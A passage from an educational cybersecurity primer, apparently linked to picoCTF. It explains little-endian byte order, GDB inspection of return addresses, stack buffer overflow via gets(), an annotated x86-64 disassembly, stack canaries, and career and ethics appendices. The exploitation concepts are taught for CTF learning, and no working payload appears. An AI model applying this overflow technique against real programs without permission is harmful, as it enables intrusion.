This is the case only for numbers. Addresses are numbers. In an attack, when you want to overwrite an address, you have to take this into account and input the bytes of the address backwards so they are interpreted in the correct manner. Why do computers do this? There are some reasons and consequences. In fact, there are also arguments for using "big endian", which means using the bytes without inverting them.
One argument commonly given in favor of little endian is that some operations are easier to do. For instance, take the number 255 in decimal, which is 0xff in hexadecimal. If the number is held in a variable type that takes 4 bytes, for example an "int" in C, it would look like this in memory:

ff 00 00 00

Then, suppose you want to cast it to a type that only takes two bytes, for example a "short" in C. In memory, you can leave the value where it is without having to move anything, and the "short" would look like this:

ff 00

Now, imagine that we were not using little endian. The type "int" would hold the number like this:

00 00 00 ff

And the "short" like this:

00 ff

Note that we had to move the ff, which originally was in the fourth byte and now is in the second byte.

In summary, what you should remember for binary exploits is that if you want to write a number into memory, you have to write its bytes backwards. Also, remember that this applies only to numbers. In the hypothetical situation that you want to place the string "HELLO" in memory, you can put it in its original order.

In GDB it is possible to show a chunk of memory at a specific location using a command such as "x/16xw 0x4005ce". This prints 16 words starting at the address 0x4005ce. In GDB's "x" command, a word ("w") is 4 bytes, so this command is going to print 64 bytes. Run the command yourself! You should see something like this:

```
(gdb) x/16xw 0x4005ce
0x4005ce <vuln+4>:  0x80c48348 0x273d8d48 0xe8000001 0xfffffec2
0x4005de <vuln+20>: 0x80458d48 0xb8c78948 0x00000000 0xfffec1e8
0x4005ee <vuln+36>: 0x458d48ff 0xc7894880 0xfffea5e8 0x058b48ff
0x4005fe <vuln+52>: 0x00200a3e 0xe8c78948 0xfffffeb6 0x55c3c990
(gdb)
```

Note that GDB prints each group of 4 bytes as a number. Because of little endianness, each of those groups of 4 bytes is reversed with respect to memory. When using this command, no matter what is in memory, everything will be printed reversed within each group of 4 bytes.
##### Function call

When a function is called, the IP moves to wherever the code of the function is located. When the function finishes, the IP moves back to the instruction right after the function call. As we mentioned previously, the address of that next instruction has to be stored somewhere so the program knows where to come back after the function is finished. We call this address the "return address". The return address is stored in the memory segment referred to as the stack.

How do we know in which part of the stack? There is a register called the Stack Pointer (SP) that points to the top of the stack. When a function is called, the stack pointer moves to make room for the return address and new local variables. When the function finishes, the Stack Pointer moves back to its position prior to the function call, making the memory addresses in which the local variables of the function were located free again.

Imagine that we have a toy memory with only a few addresses. Remember that the SP is the Stack Pointer, and the stack is a region of memory, in this case colored in yellow. Suppose that we have created no local variables or anything on the stack. The stack would look like this:

Then we create a local variable, using something like:

`int var=4;`

After that is executed, the stack would look like in the following image, because by creating a variable we push it onto the stack (in this example we are using “⇐” as a simple arrow):

Note that when we push a variable onto the stack, we subtract one address from the SP, so it points to the new top of the stack. In this case the new SP value will be 16, which means it is pointing to the address 16. If we create another local variable like this:

`int var=5;`

The stack would look like this:

And the SP would be equal to 15. In real life, on a 32-bit Intel architecture, each address contains four bytes.
Integers are stored in little endian, and the addresses would have bigger values in a running program because the stack is placed at higher addresses. A piece of the stack holding two integers with values 5 and 4 could look like this (remember that addresses and memory contents are usually represented in hex):

Let's now go to real life in our 64-bit program. In GDB, set a breakpoint in the function "main" using "b main":

`(gdb) b main`

And run the program again using "r":

```
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /vuln1

Breakpoint 2, 0x0000000000400611 in main ()
(gdb)
```

To show the assembly of the current function we are in, which is "main", use "disas":

```
(gdb) disas
Dump of assembler code for function main:
   0x000000000040060d <+0>:  push %rbp
   0x000000000040060e <+1>:  mov %rsp,%rbp
=> 0x0000000000400611 <+4>:  sub $0x10,%rsp
   0x0000000000400615 <+8>:  mov %edi,-0x4(%rbp)
   0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp)
   0x000000000040061c <+15>: mov $0x0,%eax
   0x0000000000400621 <+20>: callq 0x4005ca <vuln>
   0x0000000000400626 <+25>: mov $0x0,%eax
   0x000000000040062b <+30>: leaveq
   0x000000000040062c <+31>: retq
End of assembler dump.
```

Even if you don't know assembly, if you look through it you might guess that "callq 0x4005ca <vuln>" is the function call to "vuln". We will go to that instruction in the debugger. To advance one instruction in GDB we can use "si". Try it, and use "disas" again to see where we are now.
You should see something like this:

```
(gdb) si
0x0000000000400615 in main ()
(gdb) disas
Dump of assembler code for function main:
   0x000000000040060d <+0>:  push %rbp
   0x000000000040060e <+1>:  mov %rsp,%rbp
   0x0000000000400611 <+4>:  sub $0x10,%rsp
=> 0x0000000000400615 <+8>:  mov %edi,-0x4(%rbp)
   0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp)
   0x000000000040061c <+15>: mov $0x0,%eax
   0x0000000000400621 <+20>: callq 0x4005ca <vuln>
   0x0000000000400626 <+25>: mov $0x0,%eax
   0x000000000040062b <+30>: leaveq
   0x000000000040062c <+31>: retq
End of assembler dump.
```

We could use "si" three more times to get to the instruction where the function call is made. But this strategy would not be good if we were far away from the function call. Instead, we can set a breakpoint on the memory address of the function call, which we can see is "0x0000000000400621". To set a breakpoint on a memory address, we also use "b", but we put an asterisk before the address, like this: "b *0x0000000000400621". After pressing enter you should see something like:

```
(gdb) b *0x0000000000400621
Breakpoint 3 at 0x400621
(gdb)
```

Now, use "continue" or "c" to continue to the breakpoint:

```
(gdb) c
Continuing.

Breakpoint 3, 0x0000000000400621 in main ()
(gdb)
```

Now, verify that we actually got to where we wanted using "disas":

```
(gdb) disas
Dump of assembler code for function main:
   0x000000000040060d <+0>:  push %rbp
   0x000000000040060e <+1>:  mov %rsp,%rbp
   0x0000000000400611 <+4>:  sub $0x10,%rsp
   0x0000000000400615 <+8>:  mov %edi,-0x4(%rbp)
   0x0000000000400618 <+11>: mov %rsi,-0x10(%rbp)
   0x000000000040061c <+15>: mov $0x0,%eax
=> 0x0000000000400621 <+20>: callq 0x4005ca <vuln>
   0x0000000000400626 <+25>: mov $0x0,%eax
   0x000000000040062b <+30>: leaveq
   0x000000000040062c <+31>: retq
End of assembler dump.
(gdb)
```

At this point, the program is about to execute the function call to "vuln()". Remember that the return address is the instruction right after the function call.
Note that if it were the same as the function call, the program would return and call the function again, getting into an infinite loop. In this case, the return address is "0x0000000000400626"; remember this address. If we check the Stack Pointer (SP) right now using "x $rsp", we see that it points to an address that does not contain the return address yet:

```
(gdb) x $rsp
0x7fffffffe010: 0xffffe108
```

If we advance one instruction using "si", we are suddenly at the first instruction of the function "vuln()":

```
(gdb) si
0x00000000004005ca in vuln ()
(gdb) disas
Dump of assembler code for function vuln:
=> 0x00000000004005ca <+0>:  push %rbp
   0x00000000004005cb <+1>:  mov %rsp,%rbp
   0x00000000004005ce <+4>:  add $0xffffffffffffff80,%rsp
   0x00000000004005d2 <+8>:  lea 0x127(%rip),%rdi  # 0x400700
   0x00000000004005d9 <+15>: callq 0x4004a0 <puts@plt>
   0x00000000004005de <+20>: lea -0x80(%rbp),%rax
   0x00000000004005e2 <+24>: mov %rax,%rdi
   0x00000000004005e5 <+27>: mov $0x0,%eax
   0x00000000004005ea <+32>: callq 0x4004b0 <gets@plt>
   0x00000000004005ef <+37>: lea -0x80(%rbp),%rax
   0x00000000004005f3 <+41>: mov %rax,%rdi
   0x00000000004005f6 <+44>: callq 0x4004a0 <puts@plt>
   0x00000000004005fb <+49>: mov 0x200a3e(%rip),%rax
   0x0000000000400602 <+56>: mov %rax,%rdi
   0x0000000000400605 <+59>: callq 0x4004c0 <fflush@plt>
   0x000000000040060a <+64>: nop
   0x000000000040060b <+65>: leaveq
   0x000000000040060c <+66>: retq
End of assembler dump.
```

And if we check the SP again:

```
(gdb) x $rsp
0x7fffffffe008: 0x00400626
(gdb)
```

Do you remember that the return address was "0x0000000000400626"? We can see that the SP points to the address "0x7fffffffe008", and that address contains the return address! The whole idea of the attack is to modify the return address so the program returns to another place. In our attack example at the beginning, we modified it so it returned to the function "win()". The function gets() in C simply copies user input into memory without checking the size of the destination buffer, so we just need to supply enough input to overwrite the return address.
As a programmer, never use gets() in C; you would introduce a vulnerability in your program that is very easy to exploit!

## 12. Assembly

##### Samuel Sabogal Pardo

We previously saw in binary exploitation how some registers work and how the memory of a program is laid out. Once you get some idea of how to do basic binary exploits, to reach a more advanced level it is useful to understand assembly in more detail. There are several assembly languages, and each one is tied to the processor architecture of a computer. Processor architectures have specific instructions. For example, an Intel processor executes different instructions than an ARM processor; hence, the assembly language for ARM is different from the one for Intel.

To begin, we will be using Intel assembly, simply because the Intel architecture is so widely used. The webshell, and probably your computer, have an Intel architecture. Note that AMD processors have the same architecture and instruction set as Intel. Smartphones, in contrast to most laptop or desktop computers, generally have an ARM processor. Intel is CISC (Complex Instruction Set Computer); that implies it has many more instructions than ARM, which is RISC (Reduced Instruction Set Computer). However, we will only be exploring some instructions in Intel that are common and useful to know.

It would be too dense to explain instructions one by one in isolation. Instead, let's make a program and begin to understand it. Assembly is not easy to grasp at the beginning, but once you learn a few things it becomes very intuitive, and it is possible to read assembly to understand the logic of a program even in an architecture you have never seen before, because it has similar patterns. Therefore, we encourage you to keep trying in this part even if it does not seem easy at first.

**Outside Resource**: OpenSecurity x86-64 Training is an excellent free course on Intel assembly.

### 12.1.
Registers

We will show in this part, for reference, the most relevant registers of the Intel architecture for an example of a program in assembly we will introduce. The Intel registers are broken down into several categories. They include General Registers, Segment Registers, Index/Pointer Registers, and Flags Registers. For now, it is good to see the purpose of each register in two of those categories.

### 12.2. General Registers

Note that for the General Registers, when we are using a 64-bit processor, the register name begins with R. On a 32-bit processor, the register name begins with E, and on a 16-bit architecture it has no prefix and the name is only two letters. For example, there is a 16-bit register called AX. In 32 bits, we have the same register for the same purpose, but it can hold 32 bits and is called EAX. In 64 bits, that same register is called RAX. We can use a 16-bit or 32-bit register in a 64-bit architecture, but not the other way around. Each register is conventionally used for some specific operations, but they can be used for other purposes. These are the General Registers in 16, 32 and 64 bits:

RAX, EAX, AX (Accumulator register): Usually used to place the return value of a function, but can be used for other purposes.

RBX, EBX, BX (Base register): Used as a base pointer for memory access. We subtract or add an offset to the value of this register to access variables.

RCX, ECX, CX (Counter register): Usually used as a loop counter.

RDX, EDX, DX (Data register): Usually used to store temporary data in operations.

Note that in a 64-bit program the conventions can change. For example, in a 32-bit architecture we generally pass the arguments of a function on the stack, while in 64-bit programs we pass them in registers in many cases. For now, do not worry about those details. Focus on getting a sense of how assembly works when we show the example of a program in assembly.

### 12.3.
Index/Pointer Registers

These registers are used to mark the end or start of a region of memory, letting a program keep track of things such as the location of variables or the top of the stack, which are essential for manipulating data in memory.

RSP, ESP, SP (Stack pointer register): Indicates the top of the stack. Whenever we create a local variable, this pointer changes to make space for that variable. For example, if we create a variable that takes 4 bytes, the stack pointer moves 4 bytes to make room for that new variable.

RIP, EIP, IP (Instruction pointer): Indicates the current instruction that the program is executing. If we make this register point to an address, the program will execute the code at that address.

RBP, EBP, BP (Base pointer register): Indicates the beginning of the stack frame of a function. The stack frame is a region of memory in which we place data, such as local variables, of a specific function. To access a local variable of a function, we take the address in the base pointer and subtract an offset.

RDI, EDI, DI (Destination index register): Generally used for copying chunks of memory, which can be strings or arrays.

RSI, ESI, SI (Source index register): Similar purpose to the previous register (Destination index register).

### 12.4. Assembly example

Now, let's dive into the assembly of a program!
Go to the picoCTF webshell:

Compile the following program:

```
#include <stdio.h>

int main( ) {
   int i;
   printf( "Enter a value :");
   scanf("%d", &i);
   if(i>5){
        printf("Greater than 5");
   }else {
        printf("Less or equal than 5");
   }
   return 0;
}
```

To do that you can create a file with:

`nano example.c`

Paste the code in that file, save it with control+x, and then compile the file with:

`gcc example.c -o example`

Run it to verify its functionality with:

`./example`

You can obtain the assembly of a compiled program, without having the original source code, with the following command:

`objdump --disassemble example`

That will output the assembly of the compiled program ‘example’ on the terminal. You can redirect that output to a file, which in this case we call dump.txt, using:

`objdump --disassemble example > dump.txt`

That assembly dump has many things. For now, we will focus only on the assembly of the function ‘main’. We can dump the assembly of a specific function, in this case ‘main’, in the following manner:

`gdb -batch -ex 'file example' -ex 'disassemble main'`

Also, you can run the program in GDB like this:

`gdb example`

Set a breakpoint on main:

```
(gdb) b main
Breakpoint 1 at 0x71e
```

And run the program:

```
(gdb) r
Starting program: /home/your_user/example

Breakpoint 1, 0x000055555555471e in main ()
```

Since the program execution stopped at main, you can do ‘disas’ to obtain the assembly of ‘main’:

```
(gdb) disas
Dump of assembler code for function main:
   0x000055555555471a <+0>:  push %rbp
   0x000055555555471b <+1>:  mov %rsp,%rbp
=> 0x000055555555471e <+4>:  sub $0x10,%rsp
   0x0000555555554722 <+8>:  mov %fs:0x28,%rax
   0x000055555555472b <+17>: mov %rax,-0x8(%rbp)
   0x000055555555472f <+21>: xor %eax,%eax
   0x0000555555554731 <+23>: lea 0xfc(%rip),%rdi  # 0x555555554834
   0x0000555555554738 <+30>: mov $0x0,%eax
   0x000055555555473d <+35>: callq 0x5555555545e0 <printf@plt>
   0x0000555555554742 <+40>: lea -0xc(%rbp),%rax
   0x0000555555554746 <+44>:  mov %rax,%rsi
   0x0000555555554749 <+47>:  lea 0xf4(%rip),%rdi  # 0x555555554844
   0x0000555555554750 <+54>:  mov $0x0,%eax
   0x0000555555554755 <+59>:  callq 0x5555555545f0 <__isoc99_scanf@plt>
   0x000055555555475a <+64>:  mov -0xc(%rbp),%eax
   0x000055555555475d <+67>:  cmp $0x5,%eax
   0x0000555555554760 <+70>:  jle 0x555555554775 <main+91>
   0x0000555555554762 <+72>:  lea 0xde(%rip),%rdi  # 0x555555554847
   0x0000555555554769 <+79>:  mov $0x0,%eax
   0x000055555555476e <+84>:  callq 0x5555555545e0 <printf@plt>
   0x0000555555554773 <+89>:  jmp 0x555555554786 <main+108>
   0x0000555555554775 <+91>:  lea 0xda(%rip),%rdi  # 0x555555554856
   0x000055555555477c <+98>:  mov $0x0,%eax
   0x0000555555554781 <+103>: callq 0x5555555545e0 <printf@plt>
   0x0000555555554786 <+108>: mov $0x0,%eax
   0x000055555555478b <+113>: mov -0x8(%rbp),%rdx
   0x000055555555478f <+117>: xor %fs:0x28,%rdx
   0x0000555555554798 <+126>: je 0x55555555479f <main+133>
   0x000055555555479a <+128>: callq 0x5555555545d0 <__stack_chk_fail@plt>
   0x000055555555479f <+133>: leaveq
   0x00005555555547a0 <+134>: retq
End of assembler dump.
```

Note that the instructions on an Intel processor can be written in two types of syntax. There is the AT&T syntax, which is the one we just printed, and there is the Intel syntax. Note that the syntax is a separate matter from the architecture of the processor: here we are on the same processor, which is Intel architecture, but we can display either AT&T syntax or Intel syntax.
To print Intel syntax in GDB, we can do:

`(gdb) set disassembly-flavor intel`

If you run ‘disas’ again, you will see the same main function, but in Intel syntax:

```
(gdb) disas
Dump of assembler code for function main:
   0x000055555555471a <+0>:  push rbp
   0x000055555555471b <+1>:  mov rbp,rsp
=> 0x000055555555471e <+4>:  sub rsp,0x10
   0x0000555555554722 <+8>:  mov rax,QWORD PTR fs:0x28
   0x000055555555472b <+17>: mov QWORD PTR [rbp-0x8],rax
   0x000055555555472f <+21>: xor eax,eax
   0x0000555555554731 <+23>: lea rdi,[rip+0xfc]  # 0x555555554834
   0x0000555555554738 <+30>: mov eax,0x0
   0x000055555555473d <+35>: call 0x5555555545e0 <printf@plt>
   0x0000555555554742 <+40>: lea rax,[rbp-0xc]
   0x0000555555554746 <+44>: mov rsi,rax
   0x0000555555554749 <+47>: lea rdi,[rip+0xf4]  # 0x555555554844
   0x0000555555554750 <+54>: mov eax,0x0
   0x0000555555554755 <+59>: call 0x5555555545f0 <__isoc99_scanf@plt>
   0x000055555555475a <+64>: mov eax,DWORD PTR [rbp-0xc]
   0x000055555555475d <+67>: cmp eax,0x5
   0x0000555555554760 <+70>: jle 0x555555554775 <main+91>
   0x0000555555554762 <+72>: lea rdi,[rip+0xde]  # 0x555555554847
   0x0000555555554769 <+79>: mov eax,0x0
   0x000055555555476e <+84>: call 0x5555555545e0 <printf@plt>
   0x0000555555554773 <+89>: jmp 0x555555554786 <main+108>
   0x0000555555554775 <+91>: lea rdi,[rip+0xda]  # 0x555555554856
   0x000055555555477c <+98>: mov eax,0x0
   0x0000555555554781 <+103>: call 0x5555555545e0 <printf@plt>
   0x0000555555554786 <+108>: mov eax,0x0
   0x000055555555478b <+113>: mov rdx,QWORD PTR [rbp-0x8]
   0x000055555555478f <+117>: xor rdx,QWORD PTR fs:0x28
   0x0000555555554798 <+126>: je 0x55555555479f <main+133>
   0x000055555555479a <+128>: call 0x5555555545d0 <__stack_chk_fail@plt>
   0x000055555555479f <+133>: leave
   0x00005555555547a0 <+134>: ret
End of assembler dump.
```

Between the two syntaxes there are several differences. One of the most noticeable is that in AT&T syntax you see the symbol % all around, which is used as a prefix for registers. Also, in some operations the order of the operands is different.
Keep this in mind to prevent confusion. We will explain the program using Intel syntax, following each line of the assembly code. Remember from the binary exploitation section that the hexadecimal number we observe at the left, for example in ‘0x000055555555471a <+0>:’, is the memory address in RAM at which that assembly instruction is located.

The first line of assembly we see in the main function is the following (we removed the address shown at the left for simplicity):

`push rbp`

We observe the instruction ‘push rbp’. As we already know, rbp is the base pointer, a register used to keep track of the part of the stack at which the local variables of a function begin to be stored. In this case, the current value of rbp is pushed onto the stack, to be able to recover it later. This is an important part of a function that allows us to keep the value of the base pointer of the previous function. For example, suppose you have a function call inside another function, as in the following example in which we call func2 from func1:

```
void func2(){
    char var4;
    char var5;
    char var6;
}

void func1(){
    char var1;
    char var2;
    char var3;
    func2();
}
```

The piece of memory in which the variables of a function are stored is called the stack frame. In assembly we do not have variable names; instead, we have rbp pointing to the memory address at which the stack frame of a function begins. For example, if the program is currently executing func2, the three variables declared in func2 could look like the following in memory:

If we want to access the value of var6, we do rbp minus 3. Note that if we subtract three positions from rbp, we are pointing at var6. As you can see, accessing variables in assembly is not complicated; we just need to subtract some offset from rbp to point at the variable we want. However, we have just one register in the processor to keep the value of the base pointer.
So, what we do is push the value of the base pointer of the previous function into memory. That is the “rbp func1” that you see in the memory in the previous image. We store the rbp of the previous function, just as we store a local variable, to be able to recover it later when we come back to func1 and need to access the variables of func1. We explained all that to point out what this line is for:

`push rbp`

In that line of assembly, we store the previous value of rbp, to later restore it when we return from the current function. The push instruction places the value of a register into memory and subtracts the size of the register from the stack pointer. In a 64-bit Intel processor, a register is 8 bytes. So, when we do ‘push rbp’, 8 is automatically subtracted from the stack pointer.

In the second line:

`0x000055555555471b <+1>: mov rbp,rsp`

we assign the value of the stack pointer to the base pointer. Mov, in Intel syntax, assigns the value of the operand at the right side to the operand at the left side. In this case, rsp (stack pointer) is the operand at the right side, and rbp (base pointer) is the operand at the left. Such an assignment is done because at the beginning of a function the stack pointer is pointing at the beginning of the stack frame. When we push variables in the function, the stack pointer will move, because the stack pointer always points at the last value pushed.

Then, in the line:

`sub rsp,0x10`

we subtract 16 bytes from the stack pointer. Note that the prefix ‘0x’ denotes a hexadecimal number; 0x10 is 16 in decimal. In Intel syntax, the ‘sub’ instruction subtracts the operand at the right side from the operand at the left side. In this case, we subtract 0x10 from rsp. That subtraction is done to allocate 16 bytes on the stack. We will assign values to those bytes later.
So far, we have something like the following, in which we have 16 bytes allocated:

Then, in this line:

`mov rax,QWORD PTR fs:0x28`

we assign fs:0x28 to the register rax. QWORD PTR means that it is a pointer to a QWORD. A QWORD is simply a value of 8 bytes. fs:0x28 contains something called the stack canary, which is a random value used to mitigate the risk of buffer overflow attacks. If that value is overwritten, the program will detect an attack or error and terminate.

Then, in this line:

`mov QWORD PTR [rbp-0x8],rax`

we assign the value of rax, which currently holds the stack canary, to rbp-0x8. Note that rbp-0x8 is located in the chunk of 16 bytes we previously allocated. So, we are placing the stack canary in the first part of the stack frame of the main function. In the following image the stack canary is colored in yellow:

In assembly, we cannot assign the contents of one memory address directly to another memory address. We must read the contents of the memory address into a register and then assign that register to the other memory address. That is why rax was used.

Then, the line:

`xor eax,eax`

is used to make eax equal to zero. Note that eax is the lower 4 bytes (32 bits) of the 64-bit register rax. XOR is exclusive OR; when you XOR a value with itself, the result is always zero. This is a property of the XOR operation.

Afterwards, in this line:

`lea rdi,[rip+0xfc]  # 0x555555554834`

we assign to rdi the address of the string that contains the message "Enter a value :" in our program. The instruction ‘lea’ assigns the address computed in the square brackets. In contrast, mov would assign the content located at that address. The string "Enter a value :" is located at rip+0xfc. Note that GDB gives us an indication of what rip+0xfc evaluates to, as a comment at the right that shows 0x555555554834.
In the current GDB session you started, run the following command to print the string at that address:

`print (char*) 0x555555554834`

You will see as output:

`$2 = 0x555555554834 "Enter a value :"`

In this line:

`mov eax,0x0`

we are setting eax to 0. Note that there are no square brackets; because of that, mov assigns the value at the right side directly, not the content at address 0. We need to set eax to zero because this is the number of floating-point arguments (FP args) that will be passed to printf, which we are about to call. So, we are indicating that we are not passing any floating-point numbers to printf. Note that eax had already been set to zero by the XOR; sometimes compilers generate assembly that a human could optimize further.

In this line, we finally call printf, with the string "Enter a value :" as the argument:

`call 0x5555555545e0 <printf@plt>`

Afterwards, we are calling scanf. Remember that in C we called scanf like this:

`scanf("%d", &i);`

In assembly, the next line we execute is this:

`lea rax,[rbp-0xc]`

[rbp-0xc] is the address of a local variable; remember that rbp is the base pointer. In assembly we subtract an offset from the base pointer to access the local variable we want. At [rbp-0xc] is located the variable we declared in C as ‘int i’. In other words, [rbp-0xc] is the address of ‘i’.

Then we have:

`mov rsi,rax`

in which we assign rax to rsi. The register rsi is the source index register, which here determines where the information read from the keyboard goes in scanf. Since we assign the address of ‘i’ to that register, the user input will be stored in ‘i’.

The following line calls scanf, with the arguments that are already set:

`call 0x5555555545f0 <__isoc99_scanf@plt>`

This line:

`mov eax,DWORD PTR [rbp-0xc]`

assigns the content at [rbp-0xc] to eax. By now, [rbp-0xc], which is the spot that stores the value of the variable ‘i’ we declared in C, already has the value the user entered.
So, eax currently has the value that the user entered.

The line:

`cmp eax,0x5`

compares eax to 5. The result of that comparison is placed in flags that we do not see in the source code; they belong to the flags register (RFLAGS). Those flags are the carry flag, sign flag, overflow flag, and zero flag. Assembly automatically uses them to represent the result of a comparison.

Then, in the following line:

`jle 0x555555554775`

The instruction jle means Jump if Less or Equal. So, if in the previous comparison eax was less than or equal to 5, the execution of the program jumps to the address 0x555555554775. You may have different addresses in your assembly if you compiled it on your own, but the instructions are the same. In the assembly from the example, at address 0x555555554775, we have the following lines (note that we kept the addresses at the left of the instructions so you can verify the address you jumped to):

```
0x0000555555554775 <+91>:  lea    rdi,[rip+0xda]        # 0x555555554856
0x000055555555477c <+98>:  mov    eax,0x0
0x0000555555554781 <+103>: call   0x5555555545e0 <printf@plt>
```

Those lines will print the message "Less or equal than 5" in a similar manner to how we printed a message before. Then, the next lines after the call to printf are:

```
0x0000555555554786 <+108>: mov    eax,0x0
0x000055555555478b <+113>: mov    rdx,QWORD PTR [rbp-0x8]
0x000055555555478f <+117>: xor    rdx,QWORD PTR fs:0x28
0x0000555555554798 <+126>: je     0x55555555479f <main+133>
0x000055555555479a <+128>: call   0x5555555545d0 <__stack_chk_fail@plt>
0x000055555555479f <+133>: leave
0x00005555555547a0 <+134>: ret
```

In the first of those lines, which is:

`mov eax, 0x0`

We make eax zero. Then we have:

`mov rdx, QWORD PTR [rbp-0x8]`

That line accesses rbp-0x8, which contains the value of the stack canary, and assigns that value to rdx. Then, at this line:

`xor rdx,QWORD PTR fs:0x28`

We XOR rdx with fs:0x28. In an XOR operation, if the two operands are equal, the result is zero.
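To see why this XOR amounts to an integrity check, here is a small Python simulation of the canary mechanism. This is purely illustrative: the names and the simulated "overflow" are made up, and real canaries live in process memory rather than Python variables.

```python
import secrets

# The OS sets up one random canary per process (the value at fs:0x28).
STACK_CANARY = secrets.randbits(64)

def run_main(buffer_overflows):
    # Function prologue: copy the canary into the stack frame (rbp-0x8).
    saved_canary = STACK_CANARY

    # ... the function body runs; a buffer overflow could overwrite the slot ...
    if buffer_overflows:
        saved_canary = 0x4141414141414141  # attacker bytes spill over ('AAAA...')

    # Function epilogue: xor rdx, fs:0x28 - a result of zero means intact.
    if saved_canary ^ STACK_CANARY == 0:
        return "ret"               # je taken: normal return
    return "__stack_chk_fail"      # canary smashed: abort the program

print(run_main(False))  # -> ret
print(run_main(True))   # -> __stack_chk_fail
```

Because an overflow that reaches the saved return address must first trample the canary slot, checking the canary before `ret` catches the attack.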
Then, in this line:

`je 0x55555555479f <main+133>`

'je' means jump if equal. If the result of the XOR is zero, which sets the flags as if a comparison had been equal, we jump to 0x55555555479f.

What we are doing at a general level in the last lines is taking the stack canary from our stack frame. Remember that the stack canary was previously stored there. Now we compare it with the original value of the stack canary at fs:0x28. If the value is the same, it means that the chunk of memory which was holding the stack canary in the stack frame was never overwritten. If it was never overwritten, we jump to skip this line:

`0x000055555555479a <+128>: call 0x5555555545d0 <__stack_chk_fail@plt>`

Which calls a function that indicates that the protection was violated. Note that, in contrast, the 'jmp' instruction jumps without verifying any condition.

In the last two lines of the program:

```
0x000055555555479f <+133>: leave
0x00005555555547a0 <+134>: ret
```

The instruction 'leave' restores the old value of rbp that was stored on the stack. As we explained, the rbp of the function that called the current function is stored on the stack. Then, 'ret' pops the return address from the stack and redirects the execution of the program to that address. Note that a program can redirect its execution to another address by assigning that address to rip (the instruction pointer). The instruction 'ret' automatically pops an address from the stack and assigns it to the instruction pointer.

That is the end of the 'main' function! Stay tuned for more content on Assembly, and in the meantime check out this great online course on the topic!

## Appendix A: Careers

##### Jeffery John

With all this effort learning cyber skills, you might be wondering how to use and practice them. There are many different career paths in cybersecurity, and they all require different skills. Some of the most common careers in cybersecurity are as analysts, engineers, and penetration testers.
Organizations need people who can analyze data and find patterns, people who can design and build systems, and people who can test those systems for vulnerabilities.

One approach is with 'red' and 'blue' teams. Red teams are offensive, and they try to break into systems. Blue teams are defensive, and they try to protect systems from attacks. Both teams are important, and they work together to make sure that systems are secure.

It’s also possible to pursue a career more independently, as a consultant or freelancer. This can be a good option for people who want to work on their own schedule and have more control over their work.

The National Security Agency (NSA) also contributes to training through the RING program - Regions Investing in the Next Generation. Here’s an interactive exercise from them: https://d2hie3dpn9wvbb.cloudfront.net/NSA+Ring+Project/index.html

### A.1. Bug Bounties

One way vulnerabilities are reduced is through bug bounty programs, in which organizations offer rewards to their employees or the public for finding vulnerabilities and reporting them to be fixed. This is beneficial to the organization because it allows them to find and fix vulnerabilities before they are exploited by malicious actors. Many companies have bug bounty programs, and many people are safer because of the security flaws that have been found and fixed through them.

Bug bounty programs are also beneficial to hackers, as they can earn money legitimately while practicing their skills and helping others be more secure. Some bug bounty programs include:

- HackerOne: https://hackerone.com/bug-bounty-programs
- Bugcrowd: https://www.bugcrowd.com/programs/

Even governments offer bounties!

### A.2. The CVE® Program

When a vulnerability is found, it is assigned a CVE number, which is a unique identifier for that vulnerability. CVE stands for Common Vulnerabilities and Exposures, and it is a list of publicly known cybersecurity vulnerabilities.
CVEs are assigned by the CVE Numbering Authority (CNA). By defining and cataloging vulnerabilities, security researchers, engineers, and analysts can more easily communicate about them to each other. Imagine trying to fix a problem without knowing what to call it!

The list of CVEs, and forms to submit or update them, can be found at https://www.cve.org.

### A.3. Ethical Considerations

Before publishing a vulnerability from a bug bounty program, or as a CVE, you should consider the ethical implications of doing so. If a vulnerability is published before it is fixed, it could be exploited by malicious actors. This could cause harm to people or organizations, as well as legal consequences for the publisher. Each organization or program will have its own rules and preferences for how to responsibly disclose vulnerabilities.

Additionally, never hack into a system without permission, or attempt to go further than requested. This is illegal, and it could similarly cause harm to people or organizations. Bug bounty programs will define clear scopes for what is allowed.

If the organization does not respond to a disclosure of a security risk to them or their users within a reasonable timeframe, there may be other options, such as contacting a governing agency. In the United States, the Cybersecurity and Infrastructure Security Agency (CISA) is a good place to start: https://www.cisa.gov/coordinated-vulnerability-disclosure-process.

If a malicious actor is able to find and exploit an unreported vulnerability, it is known as a 'zero-day', because the organization has had zero days to fix it. These are considered the most dangerous, and can impact millions of innocent people. Ultimately, careers in cybersecurity are all about preventing these from happening.

While this Primer cannot cover all the ethical considerations of reporting individual vulnerabilities, it is important to consider your ability to help others through responsible disclosure.
## Appendix B: Virtual Environment

##### Jeffery John

We mentioned Linux in our chapter on the Shell, and you may be wondering what your next step is. The great thing about Linux is that it’s hard to outgrow!

Linux is a family of open source systems, which are distributed as 'distros', and each has strengths and weaknesses. The advantage of Linux is that the user has the power to control their own device, and freely choose between distros. Most of the world’s supercomputers, servers, mobile devices, and embedded systems run a distro of Linux. Even the International Space Station runs Linux!

When developers and hackers choose their tools, including many mentioned in this Primer, they have to consider how their hardware and software will interact. This is known as their 'environment'.

### B.1. Web

Many hacking tools are web-based, and so they’ll work on any operating system that allows you to run a web browser. A good example is CrackStation, which allows anyone with an internet connection to check password hashes.

Another option is to use a remote server, which is a computer that you can access over the internet. Typically, you’d own or rent this server, so you’d have more control over how it’s used. This is a great way to run tools that require a lot of processing power, or to run tools that you don’t want to run on your own computer due to space or computing power limitations. Remote servers are often called and offered by 'cloud' services, and they’re a great way to get started with hacking!

Note that web-based tools are often hosted on their own remote servers, which they use as a 'backend' to process inputs and requests from the 'frontend', or the website that you can interact with. Having a remote server, like an instance of Amazon Web Services, Google Cloud Platform, or Azure, is unique in that you can choose the tools that are installed, the capability of the server, and how accessible to the public it is.

### B.2. Virtual Machines

Virtual machines (VMs) are a great way to run tools that require a specific operating system, or to run multiple operating systems at once. These can be run locally, or on a remote server. You might sometimes hear VMs referred to as a 'box', because anything inside of one tends to stay inside. You can treat a VM as if it were a separate computer - even if it’s sharing hardware locally or with your remote server!

For example, if you use a Windows computer, you can run a virtual machine with a distro of Linux to run Linux tools. You can also configure your virtual machine to be created in a certain way, and then reset or share that state with others! Podman is an excellent option for this, and helps teams have effectively identical environments so collaboration is easy.

